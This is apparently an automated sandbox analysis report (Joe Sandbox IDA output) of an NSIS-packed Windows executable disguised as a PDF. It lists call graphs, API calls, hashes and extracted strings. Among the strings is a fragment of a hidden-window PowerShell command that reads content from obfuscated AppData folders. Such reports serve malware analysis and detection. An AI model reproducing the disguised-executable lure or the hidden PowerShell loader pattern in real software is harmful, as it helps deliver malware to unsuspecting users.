calls 1756->1757 1759 403dc4 1757->1759 1758->1747 1759->1738 1759->1747 1761 403f38 GetDlgItem 1762 403f55 ShowWindow KiUserCallbackDispatcher 1761->1762 1763 403f4d 1761->1763 1789 4041a7 KiUserCallbackDispatcher 1762->1789 1763->1762 1765 403f7f EnableWindow 1768 403f93 1765->1768 1766 403f98 GetSystemMenu EnableMenuItem SendMessageW 1767 403fc8 SendMessageW 1766->1767 1766->1768 1767->1768 1768->1766 1790 4041ba SendMessageW 1768->1790 1791 4060c1 lstrcpynW 1768->1791 1771 403ff6 lstrlenW 1772 4060e3 18 API calls 1771->1772 1773 40400c SetWindowTextW 1772->1773 1774 401389 2 API calls 1773->1774 1774->1776 1775 404050 DestroyWindow 1777 40406a CreateDialogParamW 1775->1777 1775->1785 1776->1740 1776->1741 1776->1745 1776->1746 1776->1751 1776->1775 1786 404185 1776->1786 1778 40409d 1777->1778 1777->1785 1779 404185 19 API calls 1778->1779 1780 4040a8 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 1779->1780 1781 401389 2 API calls 1780->1781 1782 4040ee 1781->1782 1782->1746 1783 4040f6 ShowWindow 1782->1783 1784 4041d1 SendMessageW 1783->1784 1784->1785 1785->1744 1785->1746 1787 4060e3 18 API calls 1786->1787 1788 404190 SetDlgItemTextW 1787->1788 1788->1761 1789->1765 1790->1768 1791->1771 1793 404165 1792->1793 1794 40416b SendMessageW 1792->1794 1793->1794 1794->1754 1796 404204 GetWindowLongW 1795->1796 1806 40428d 1795->1806 1797 404215 1796->1797 1796->1806 1798 404224 GetSysColor 1797->1798 1799 404227 1797->1799 1798->1799 1800 404237 SetBkMode 1799->1800 1801 40422d SetTextColor 1799->1801 1802 404255 1800->1802 1803 40424f GetSysColor 1800->1803 1801->1800 1804 404266 1802->1804 1805 40425c SetBkColor 1802->1805 1803->1802 1804->1806 1807 404280 CreateBrushIndirect 1804->1807 1808 404279 DeleteObject 1804->1808 1805->1804 1806->1746 1807->1806 1808->1807

                    Callgraph

                    • Executed
                    • Not Executed
                    • Opacity -> Relevance
                    • Disassembly available
                    callgraph 0 Function_004060C1 1 Function_00405AC1 2 Function_00405CC5 3 Function_00405D48 4 Function_004032C9 5 Function_0040654C 6 Function_004041D1 7 Function_00405C51 8 Function_00406355 8->7 19 Function_00405AEC 8->19 53 Function_00405AA2 8->53 9 Function_004064D7 10 Function_00406757 40 Function_0040708F 10->40 42 Function_00407110 10->42 55 Function_0040702A 10->55 11 Function_0040385A 12 Function_0040415E 13 Function_004032E0 13->2 13->8 18 Function_0040576C 13->18 13->19 26 Function_00405A75 13->26 14 Function_00403BE0 16 Function_004060E3 14->16 34 Function_00406008 14->34 52 Function_00406021 14->52 15 Function_00405F62 23 Function_00405DF0 15->23 16->0 16->8 16->16 16->34 39 Function_00405F8E 16->39 17 Function_0040586A 24 Function_00405C71 17->24 20 Function_004041EC 21 Function_0040136D 21->52 22 Function_004056EF 23->3 23->7 23->16 28 Function_00405BFB 23->28 44 Function_00405C96 23->44 46 Function_00405D19 23->46 25 Function_004052F3 25->6 35 Function_00401389 25->35 27 Function_00403875 27->11 29 Function_00405B7D 29->0 29->1 29->8 29->26 31 Function_00406404 29->31 50 Function_00405B20 29->50 30 Function_00402E82 30->0 30->1 30->4 30->5 30->7 30->44 48 Function_00402E1E 30->48 60 Function_004032B3 30->60 64 Function_004030BB 30->64 32 Function_00404185 32->16 33 Function_00405806 35->21 61 Function_00401434 35->61 36 Function_00405789 47 Function_0040649B 36->47 37 Function_0040390A 37->0 37->1 37->11 37->14 37->16 37->25 37->26 37->29 37->34 38 Function_0040140B 37->38 37->39 37->47 37->53 56 Function_0040642B 37->56 38->35 41 Function_0040660F 43 Function_00403311 43->0 43->13 43->15 43->16 43->18 43->22 43->29 43->30 43->33 43->36 43->37 43->38 43->47 51 Function_004057A1 43->51 43->53 43->56 58 Function_00403830 43->58 45 Function_00402D98 47->56 48->9 49 Function_00405220 49->16 50->53 54 Function_004041A7 57 Function_00403CAD 57->0 57->6 57->12 57->16 57->20 57->32 57->35 57->38 57->54 62 Function_004041BA 57->62 58->27 59 Function_004058B2 58->59 59->0 59->1 59->15 59->17 59->26 59->29 59->31 59->49 59->59 60->46 63 Function_004065BA 63->10 63->41 64->3 64->4 64->49 64->60 64->63

                    Executed Functions

                    Function 00403311 Relevance: 89.7, APIs: 33, Strings: 18, Instructions: 401stringfilecomCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 0 403311-403344 SetErrorMode GetVersion 1 403346-40334e call 40649b 0->1 2 403357 0->2 1->2 7 403350 1->7 4 40335c-403370 call 40642b lstrlenA 2->4 9 403372-4033e6 call 40649b * 2 #17 OleInitialize SHGetFileInfoW call 4060c1 GetCommandLineW call 4060c1 GetModuleHandleW 4->9 7->2 18 4033f0-40340a call 405aa2 CharNextW 9->18 19 4033e8-4033ef 9->19 22 403410-403416 18->22 23 403521-40353b GetTempPathW call 4032e0 18->23 19->18 25 403418-40341d 22->25 26 40341f-403423 22->26 30 403593-4035ad DeleteFileW call 402e82 23->30 31 40353d-40355b GetWindowsDirectoryW lstrcatW call 4032e0 23->31 25->25 25->26 28 403425-403429 26->28 29 40342a-40342e 26->29 28->29 32 403434-40343a 29->32 33 4034ed-4034fa call 405aa2 29->33 51 4035b3-4035b9 30->51 52 40365e-40366e call 403830 OleUninitialize 30->52 31->30 48 40355d-40358d GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 4032e0 31->48 37 403455-40348e 32->37 38 40343c-403444 32->38 49 4034fc-4034fd 33->49 50 4034fe-403504 33->50 39 403490-403495 37->39 40 4034ab-4034e5 37->40 44 403446-403449 38->44 45 40344b 38->45 39->40 46 403497-40349f 39->46 40->33 47 4034e7-4034eb 40->47 44->37 44->45 45->37 54 4034a1-4034a4 46->54 55 4034a6 46->55 47->33 56 40350c-40351a call 4060c1 47->56 48->30 48->52 49->50 50->22 58 40350a 50->58 59 40364e-403655 call 40390a 51->59 60 4035bf-4035ca call 405aa2 51->60 67 403794-40379a 52->67 68 403674-403684 call 405806 ExitProcess 52->68 54->40 54->55 55->40 63 40351f 56->63 58->63 70 40365a 59->70 74 403618-403622 60->74 75 4035cc-403601 60->75 63->23 72 403818-403820 67->72 73 40379c-4037b2 GetCurrentProcess OpenProcessToken 67->73 70->52 77 403822 72->77 78 403826-40382a ExitProcess 72->78 82 4037b4-4037e2 LookupPrivilegeValueW AdjustTokenPrivileges 73->82 83 4037e8-4037f6 call 40649b 73->83 80 403624-403632 call 405b7d 74->80 81 40368a-40369e call 405789 lstrcatW 74->81 76 403603-403607 75->76 84 403610-403614 76->84 85 403609-40360e 76->85 77->78 80->52 93 403634-40364a call 4060c1 * 2 80->93 94 4036a0-4036a6 lstrcatW 81->94 95 4036ab-4036c5 lstrcatW lstrcmpiW 81->95 82->83 96 403804-40380f ExitWindowsEx 83->96 97 4037f8-403802 83->97 84->76 89 403616 84->89 85->84 85->89 89->74 93->59 94->95 95->52 100 4036c7-4036ca 95->100 96->72 98 403811-403813 call 40140b 96->98 97->96 97->98 98->72 103 4036d3 call 40576c 100->103 104 4036cc call 4056ef 100->104 109 4036d8-4036e6 SetCurrentDirectoryW 103->109 111 4036d1 104->111 112 4036f3-40371c call 4060c1 109->112 113 4036e8-4036ee call 4060c1 109->113 111->109 117 403721-40373d call 4060e3 DeleteFileW 112->117 113->112 120 40377e-403786 117->120 121 40373f-40374f CopyFileW 117->121 120->117 122 403788-40378f call 405f62 120->122 121->120 123 403751-40376a call 405f62 call 4060e3 call 4057a1 121->123 122->52 131 40376f-403771 123->131 131->120 132 403773-40377a CloseHandle 131->132 132->120
                    APIs
                    • SetErrorMode.KERNELBASE ref: 00403334
                    • GetVersion.KERNEL32 ref: 0040333A
                    • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403363
                    • #17.COMCTL32(00000007,00000009), ref: 00403386
                    • OleInitialize.OLE32(00000000), ref: 0040338D
                    • SHGetFileInfoW.SHELL32(0079FEE0,00000000,?,000002B4,00000000), ref: 004033A9
                    • GetCommandLineW.KERNEL32(007A7A20,NSIS Error), ref: 004033BE
                    • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe",00000000), ref: 004033D1
                    • CharNextW.USER32(00000000,"C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe",00000020), ref: 004033F8
                      • Part of subcall function 0040649B: GetModuleHandleA.KERNEL32(?,00000020,?,0040337A,00000009), ref: 004064AD
                      • Part of subcall function 0040649B: GetProcAddress.KERNEL32(00000000,?), ref: 004064C8
                    • GetTempPathW.KERNEL32(00000400,C:\Users\user~1\AppData\Local\Temp\), ref: 00403532
                    • GetWindowsDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,000003FB), ref: 00403543
                    • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,\Temp), ref: 0040354F
                    • GetTempPathW.KERNEL32(000003FC,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,\Temp), ref: 00403563
                    • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,Low), ref: 0040356B
                    • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,Low), ref: 0040357C
                    • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user~1\AppData\Local\Temp\), ref: 00403584
                    • DeleteFileW.KERNELBASE(1033), ref: 00403598
                      • Part of subcall function 004060C1: lstrcpynW.KERNEL32(?,?,00000400,004033BE,007A7A20,NSIS Error), ref: 004060CE
                    • OleUninitialize.OLE32(?), ref: 00403663
                    • ExitProcess.KERNEL32 ref: 00403684
                    • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,~nsu), ref: 00403697
                    • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,0040A26C), ref: 004036A6
                    • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,.tmp), ref: 004036B1
                    • lstrcmpiW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user~1\AppData\Local\Temp\,.tmp,C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe",00000000,?), ref: 004036BD
                    • SetCurrentDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\), ref: 004036D9
                    • DeleteFileW.KERNEL32(0079F6E0,0079F6E0,?,"powershell.exe" -windowstyle hidden "$unterraced=Get-Content 'C:\Users\user\AppData\Local\twinsomeness\Pissoirers\Spirochete,?), ref: 00403733
                    • CopyFileW.KERNEL32(C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe,0079F6E0,00000001), ref: 00403747
                    • CloseHandle.KERNEL32(00000000,0079F6E0,0079F6E0,?,0079F6E0,00000000), ref: 00403774
                    • GetCurrentProcess.KERNEL32(00000028,?), ref: 004037A3
                    • OpenProcessToken.ADVAPI32(00000000), ref: 004037AA
                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004037BF
                    • AdjustTokenPrivileges.ADVAPI32 ref: 004037E2
                    • ExitWindowsEx.USER32(00000002,80040002), ref: 00403807
                    • ExitProcess.KERNEL32 ref: 0040382A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1232120209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1232107114.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232134369.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232781709.00000000007DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232781709.000000000081D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BPN__S-I03810366200624-820240628503036_202407010849535435_202407021350.jbxd
                    Similarity
                    • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                    • String ID: "C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe"$"powershell.exe" -windowstyle hidden "$unterraced=Get-Content 'C:\Users\user\AppData\Local\twinsomeness\Pissoirers\Spirochete$.tmp$1033$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\AppData\Local\twinsomeness$C:\Users\user\AppData\Local\twinsomeness\Pissoirers$C:\Users\user\Desktop$C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                    • API String ID: 2488574733-3349086422
                    • Opcode ID: b157897f41e49d76ae2a424120b5c2a4585d2e59855415331baa82df7090685b
                    • Instruction ID: 1d18e1ae4f12dbf1a70a21db887ff621c25f6ffaea09574894501c471ee002d0
                    • Opcode Fuzzy Hash: b157897f41e49d76ae2a424120b5c2a4585d2e59855415331baa82df7090685b
                    • Instruction Fuzzy Hash: 9CD1E571100310ABD720BF759D45A2B3AADEF8174AF10483EF581B62D1DF7D8A458B6E
                    Function 004060E3 Relevance: 23.0, APIs: 8, Strings: 5, Instructions: 207stringCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 377 4060e3-4060ee 378 4060f0-4060ff 377->378 379 406101-406117 377->379 378->379 380 40611d-40612a 379->380 381 40632f-406335 379->381 380->381 384 406130-406137 380->384 382 40633b-406346 381->382 383 40613c-406149 381->383 385 406351-406352 382->385 386 406348-40634c call 4060c1 382->386 383->382 387 40614f-40615b 383->387 384->381 386->385 389 406161-40619d 387->389 390 40631c 387->390 391 4061a3-4061ae GetVersion 389->391 392 4062bd-4062c1 389->392 393 40632a-40632d 390->393 394 40631e-406328 390->394 397 4061b0-4061b4 391->397 398 4061c8 391->398 395 4062c3-4062c7 392->395 396 4062f6-4062fa 392->396 393->381 394->381 400 4062d7-4062e4 call 4060c1 395->400 401 4062c9-4062d5 call 406008 395->401 403 406309-40631a lstrlenW 396->403 404 4062fc-406304 call 4060e3 396->404 397->398 399 4061b6-4061ba 397->399 402 4061cf-4061d6 398->402 399->398 405 4061bc-4061c0 399->405 415 4062e9-4062f2 400->415 401->415 407 4061d8-4061da 402->407 408 4061db-4061dd 402->408 403->381 404->403 405->398 411 4061c2-4061c6 405->411 407->408 413 406219-40621c 408->413 414 4061df-4061fc call 405f8e 408->414 411->402 418 40622c-40622f 413->418 419 40621e-40622a GetSystemDirectoryW 413->419 422 406201-406205 414->422 415->403 417 4062f4 415->417 423 4062b5-4062bb call 406355 417->423 420 406231-40623f GetWindowsDirectoryW 418->420 421 40629a-40629c 418->421 424 40629e-4062a2 419->424 420->421 421->424 425 406241-40624b 421->425 426 4062a4-4062a8 422->426 427 40620b-406214 call 4060e3 422->427 423->403 424->423 424->426 429 406265-40627b SHGetSpecialFolderLocation 425->429 430 40624d-406250 425->430 426->423 432 4062aa-4062b0 lstrcatW 426->432 427->424 435 406296 429->435 436 40627d-406294 SHGetPathFromIDListW CoTaskMemFree 429->436 430->429 434 406252-406259 430->434 432->423 438 406261-406263 434->438 435->421 436->424 436->435 438->424 438->429
                    APIs
                    • GetVersion.KERNEL32(00000000,udvistes,?,00405257,udvistes,00000000,00000000,00796DF3), ref: 004061A6
                    • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 00406224
                    • GetWindowsDirectoryW.KERNEL32(: Completed,00000400), ref: 00406237
                    • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00406273
                    • SHGetPathFromIDListW.SHELL32(?,: Completed), ref: 00406281
                    • CoTaskMemFree.OLE32(?), ref: 0040628C
                    • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 004062B0
                    • lstrlenW.KERNEL32(: Completed,00000000,udvistes,?,00405257,udvistes,00000000,00000000,00796DF3), ref: 0040630A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1232120209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1232107114.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232134369.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232781709.00000000007DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232781709.000000000081D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BPN__S-I03810366200624-820240628503036_202407010849535435_202407021350.jbxd
                    Similarity
                    • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                    • String ID: "powershell.exe" -windowstyle hidden "$unterraced=Get-Content 'C:\Users\user\AppData\Local\twinsomeness\Pissoirers\Spirochete$: Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$udvistes
                    • API String ID: 900638850-3610884065
                    • Opcode ID: 798394cd79efbf8b9b83d6ae683917ff9149f8dcce4e50bc544776fb700d76f6
                    • Instruction ID: 9b361a1576cc62e439b693cb4d410f4da8e3c7a326f6bf2b8b74f29af692ed76
                    • Opcode Fuzzy Hash: 798394cd79efbf8b9b83d6ae683917ff9149f8dcce4e50bc544776fb700d76f6
                    • Instruction Fuzzy Hash: 7B611471A00205ABDF20AF65DC40AAE37A5EF45314F12C17FE942BA2D0D63D89A5CB5E
                    Function 004058B2 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148filestringCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 439 4058b2-4058d8 call 405b7d 442 4058f1-4058f8 439->442 443 4058da-4058ec DeleteFileW 439->443 445 4058fa-4058fc 442->445 446 40590b-40591b call 4060c1 442->446 444 405a6e-405a72 443->444 447 405902-405905 445->447 448 405a1c-405a21 445->448 452 40592a-40592b call 405ac1 446->452 453 40591d-405928 lstrcatW 446->453 447->446 447->448 448->444 450 405a23-405a26 448->450 454 405a30-405a38 call 406404 450->454 455 405a28-405a2e 450->455 456 405930-405934 452->456 453->456 454->444 463 405a3a-405a4e call 405a75 call 40586a 454->463 455->444 459 405940-405946 lstrcatW 456->459 460 405936-40593e 456->460 462 40594b-405967 lstrlenW FindFirstFileW 459->462 460->459 460->462 464 405a11-405a15 462->464 465 40596d-405975 462->465 479 405a50-405a53 463->479 480 405a66-405a69 call 405220 463->480 464->448 467 405a17 464->467 468 405995-4059a9 call 4060c1 465->468 469 405977-40597f 465->469 467->448 481 4059c0-4059cb call 40586a 468->481 482 4059ab-4059b3 468->482 471 405981-405989 469->471 472 4059f4-405a04 FindNextFileW 469->472 471->468 475 40598b-405993 471->475 472->465 478 405a0a-405a0b FindClose 472->478 475->468 475->472 478->464 479->455 485 405a55-405a64 call 405220 call 405f62 479->485 480->444 492 4059ec-4059ef call 405220 481->492 493 4059cd-4059d0 481->493 482->472 486 4059b5-4059b9 call 4058b2 482->486 485->444 491 4059be 486->491 491->472 492->472 495 4059d2-4059e2 call 405220 call 405f62 493->495 496 4059e4-4059ea 493->496 495->472 496->472
                    APIs
                    • DeleteFileW.KERNELBASE(?,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 004058DB
                    • lstrcatW.KERNEL32(007A3F28,\*.*), ref: 00405923
                    • lstrcatW.KERNEL32(?,0040A014), ref: 00405946
                    • lstrlenW.KERNEL32(?,?,0040A014,?,007A3F28,?), ref: 0040594C
                    • FindFirstFileW.KERNEL32(007A3F28,?,?,?,0040A014,?,007A3F28,?), ref: 0040595C
                    • FindNextFileW.KERNEL32(00000000,?,000000F2,?,?,?,?,?), ref: 004059FC
                    • FindClose.KERNEL32(00000000), ref: 00405A0B
                    Strings
                    • "C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe", xrefs: 004058B2
                    • \*.*, xrefs: 0040591D
                    • (?z, xrefs: 0040590B
                    • C:\Users\user~1\AppData\Local\Temp\, xrefs: 004058BF
                    Memory Dump Source
                    • Source File: 00000000.00000002.1232120209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1232107114.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232134369.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232781709.00000000007DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232781709.000000000081D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BPN__S-I03810366200624-820240628503036_202407010849535435_202407021350.jbxd
                    Similarity
                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                    • String ID: "C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exe"$(?z$C:\Users\user~1\AppData\Local\Temp\$\*.*
                    • API String ID: 2035342205-3803386400
                    • Opcode ID: e65c1afb5ce04bfff1b9dd792645133c2580891d9bff7bb92b93a5cef5ee754a
                    • Instruction ID: 1160c0d77fe4d13f1128eb1d577554063cb727c3bd77b197dbc427f3935a6ad6
                    • Opcode Fuzzy Hash: e65c1afb5ce04bfff1b9dd792645133c2580891d9bff7bb92b93a5cef5ee754a
                    • Instruction Fuzzy Hash: 4341D231900A14F6CB21AB618C89ABF7678DF45728F14823BF811751D1DB7C4A819F6E
                    Function 00406404 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 14fileCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 606 406404-406418 FindFirstFileW 607 406425 606->607 608 40641a-406423 FindClose 606->608 609 406427-406428 607->609 608->609
                    APIs
                    • FindFirstFileW.KERNELBASE(?,007A4F70,C:\Users\user~1\AppData\Local\Temp\nss75DB.tmp,00405BC6,C:\Users\user~1\AppData\Local\Temp\nss75DB.tmp,C:\Users\user~1\AppData\Local\Temp\nss75DB.tmp,00000000,C:\Users\user~1\AppData\Local\Temp\nss75DB.tmp,C:\Users\user~1\AppData\Local\Temp\nss75DB.tmp,?,?,C:\Users\user~1\AppData\Local\Temp\,004058D2,?,771B3420,C:\Users\user~1\AppData\Local\Temp\), ref: 0040640F
                    • FindClose.KERNELBASE(00000000), ref: 0040641B
                    Strings
                    • pOz, xrefs: 00406405
                    • C:\Users\user~1\AppData\Local\Temp\nss75DB.tmp, xrefs: 00406404
                    Memory Dump Source
                    • Source File: 00000000.00000002.1232120209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1232107114.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232134369.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232148611.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232781709.00000000007DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1232781709.000000000081D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BPN__S-I03810366200624-820240628503036_202407010849535435_202407021350.jbxd
                    Similarity
                    • API ID: Find$CloseFileFirst
                    • String ID: C:\Users\user~1\AppData\Local\Temp\nss75DB.tmp$pOz
                    • API String ID: 2295610775-1254625982
                    • Opcode ID: 86473a827e26f35012b0381fcf693fd2ef81f82e4a2ea800dcb2c6bd3b2c9d2b
                    • Instruction ID: 1a5cf689ee624dc4a49ee510f31fc256c936ed076e10f29bc7cab2e009227d9e
                    • Opcode Fuzzy Hash: 86473a827e26f35012b0381fcf693fd2ef81f82e4a2ea800dcb2c6bd3b2c9d2b
                    • Instruction Fuzzy Hash: 66D012715081209FC3001B786D0C85B7E58AF4A3307758F36F466F12E4D7788C62869C
                    Function 00403CAD Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
